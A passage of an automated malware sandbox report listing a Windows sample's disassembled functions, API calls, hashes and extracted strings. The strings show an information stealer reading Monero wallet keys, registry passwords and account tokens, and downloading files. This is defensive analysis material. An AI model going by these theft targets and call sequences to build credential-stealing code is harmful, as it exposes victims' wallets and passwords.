                            • lstrcat.KERNEL32(?,00000000), ref: 003544A3
                            • StrCmpCA.SHLWAPI(?,003608D1), ref: 003544C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003544D2
                            • lstrcat.KERNEL32(00000000,?), ref: 003544E5
                            • lstrcat.KERNEL32(00000000,00360FB8), ref: 003544F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: 7a52b7fb43e871bc41be9980eb7fb8fe5d089888b40b4b9719329b40e1c8f5c0
                            • Instruction ID: d144d6103a5fa8171b48aea0ad00a8ce9665d1d444f4e6b4420ae8ca428b11d9
                            • Opcode Fuzzy Hash: 7a52b7fb43e871bc41be9980eb7fb8fe5d089888b40b4b9719329b40e1c8f5c0
                            • Instruction Fuzzy Hash: F9716B76900208ABDB15EBA0DC85FEE73B9AB58301F004599FA05A7191EB34DB4DDF61
                            Function 00341310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003412B4
                              • Part of subcall function 003412A0: RtlAllocateHeap.NTDLL(00000000), ref: 003412BB
                              • Part of subcall function 003412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003412D7
                              • Part of subcall function 003412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003412F5
                              • Part of subcall function 003412A0: RegCloseKey.ADVAPI32(?), ref: 003412FF
                            • lstrcat.KERNEL32(?,00000000), ref: 0034134F
                            • lstrlen.KERNEL32(?), ref: 0034135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00341377
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,00FAF740,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 00358B86
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00341465
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
                              • Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
                              • Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
                              • Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
                              • Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
                              • Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 003414EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 7ccb2016b0e0b644e58c96129ab05acd852d0721131bbecc0bd94a3a555ad56d
                            • Instruction ID: b3a8e8a9d00c161f48e6c7fd7511f3e95d0a26fa708bc9f64dd57d4bc27d5720
                            • Opcode Fuzzy Hash: 7ccb2016b0e0b644e58c96129ab05acd852d0721131bbecc0bd94a3a555ad56d
                            • Instruction Fuzzy Hash: 455153B1D5051857CB16EB60DC92FED777CAF54301F404298BA0AAA091EF306B8DDFA6
                            Function 003475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0034733A
                              • Part of subcall function 003472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003473B1
                              • Part of subcall function 003472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0034740D
                              • Part of subcall function 003472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00347452
                              • Part of subcall function 003472D0: HeapFree.KERNEL32(00000000), ref: 00347459
                            • lstrcat.KERNEL32(00000000,003617FC), ref: 00347606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00347648
                            • lstrcat.KERNEL32(00000000, : ), ref: 0034765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0034768F
                            • lstrcat.KERNEL32(00000000,00361804), ref: 003476A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003476D3
                            • lstrcat.KERNEL32(00000000,00361808), ref: 003476ED
                            • task.LIBCPMTD ref: 003476FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                            • String ID: :
                            • API String ID: 2677904052-3653984579
                            • Opcode ID: 8c754faf2ad67d9700c0d82f8a382673a3486beb66313b20ea6833a788e22bb1
                            • Instruction ID: 0fc42ac95f7768f061496f6957e38b26fc4b05c3fd6cec1fc74ed75e3bd5d0ba
                            • Opcode Fuzzy Hash: 8c754faf2ad67d9700c0d82f8a382673a3486beb66313b20ea6833a788e22bb1
                            • Instruction Fuzzy Hash: 56316B71D00109DBDB06EBA4DC85DEE73B9FB64301B14410AF502BB295EB38A94ADB61
                            Function 00358100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00FBDE18,00000000,?,00360E2C,00000000,?,00000000), ref: 00358130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00358137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00358158
                            • __aulldiv.LIBCMT ref: 00358172
                            • __aulldiv.LIBCMT ref: 00358180
                            • wsprintfA.USER32 ref: 003581AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: cf6decc5483efa2b29a07b9b965c857080c4ee72954abf435fd66079df15c706
                            • Instruction ID: 68399cfc7c9211d717bc17adf2d5ead759dc4a2bacf08861aadc1e5aa5b51d57
                            • Opcode Fuzzy Hash: cf6decc5483efa2b29a07b9b965c857080c4ee72954abf435fd66079df15c706
                            • Instruction Fuzzy Hash: 4A2160B1E44208ABEB10DFD4CC49FAFB7B8FB44B01F104509FA05BB290D77859058BA5
                            Function 003460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
                              • Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849
                            • InternetOpenA.WININET(00360DF7,00000001,00000000,00000000,00000000), ref: 0034610F
                            • StrCmpCA.SHLWAPI(?,00FBE858), ref: 00346147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0034618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003461B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 003461DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0034620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00346249
                            • InternetCloseHandle.WININET(?), ref: 00346253
                            • InternetCloseHandle.WININET(00000000), ref: 00346260
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: e659028daf40fd6757dcaeb2e7b96877185537be99edbba4d8031d1853b29551
                            • Instruction ID: 0e3c3e5d475eea7ae4e93f83946964e61bb5da4f2cd9f3ec79dfd71f73ba8cf8
                            • Opcode Fuzzy Hash: e659028daf40fd6757dcaeb2e7b96877185537be99edbba4d8031d1853b29551
                            • Instruction Fuzzy Hash: 95519470900208ABEB21DF60CC46BEE77B8FB44701F108599BA05BB1C0DBB46A89DF56
                            Function 003472D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0034733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003473B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0034740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00347452
                            • HeapFree.KERNEL32(00000000), ref: 00347459
                            • task.LIBCPMTD ref: 00347555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuetask
                            • String ID: Password
                            • API String ID: 775622407-3434357891
                            • Opcode ID: 2985e877dd5f8ee819c8255b22441a18c0d65ad4be52eff404eb0dcf32a7741b
                            • Instruction ID: 110d6a954d6ccf0d59b68c102cc5e418409f4dd9f7835e4a00ada91fd56a6b09
                            • Opcode Fuzzy Hash: 2985e877dd5f8ee819c8255b22441a18c0d65ad4be52eff404eb0dcf32a7741b
                            • Instruction Fuzzy Hash: FC611BB591415C9BDB25DB50CC45BEAB7F8BF44300F0085E9E649AA241DBB06BC9CFA1
                            Function 0034BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                            • lstrlen.KERNEL32(00000000), ref: 0034BC9F
                              • Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0034BCCD
                            • lstrlen.KERNEL32(00000000), ref: 0034BDA5
                            • lstrlen.KERNEL32(00000000), ref: 0034BDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: e26fd5a19a935adfcd36c61e775c739400fd5b22d4a63098a68f7d0d5b8fbaaa
                            • Instruction ID: 84ab634ebc210bc8fc7e077252520eba4bcc0169042389bdc9e9905ca23b7e6d
                            • Opcode Fuzzy Hash: e26fd5a19a935adfcd36c61e775c739400fd5b22d4a63098a68f7d0d5b8fbaaa
                            • Instruction Fuzzy Hash: B4B154719105089BDB06FBA0CC96EEE7778BF54301F404259F907BA1A1EF346A4DEB62
                            Function 00356770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: 90daa86bfd4a1abf455c4747930d1c2de94fbacf8dc7b819c14524ac5a0f43f6
                            • Instruction ID: 2bea2bfd7a1f48d8db2bb7f988324490962c7217e100ea1e5d945a96a06c4f70
                            • Opcode Fuzzy Hash: 90daa86bfd4a1abf455c4747930d1c2de94fbacf8dc7b819c14524ac5a0f43f6
                            • Instruction Fuzzy Hash: C4F05430904209EFE3449FE0E90972C7B74FB18703F04019AEA05D7290D6744B56BB96
                            Function 00344FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00344FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00344FD1
                            • InternetOpenA.WININET(00360DDF,00000000,00000000,00000000,00000000), ref: 00344FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00345011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00345041
                            • InternetCloseHandle.WININET(?), ref: 003450B9
                            • InternetCloseHandle.WININET(?), ref: 003450C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: f29c49876981f0364de52d0d75a61d06598a330a13edb09a4c6648272eb3547b
                            • Instruction ID: 9310433d5de8995ae9423d97f94cce1c31634d6d7af534f61c4ed6398a3ce1cb
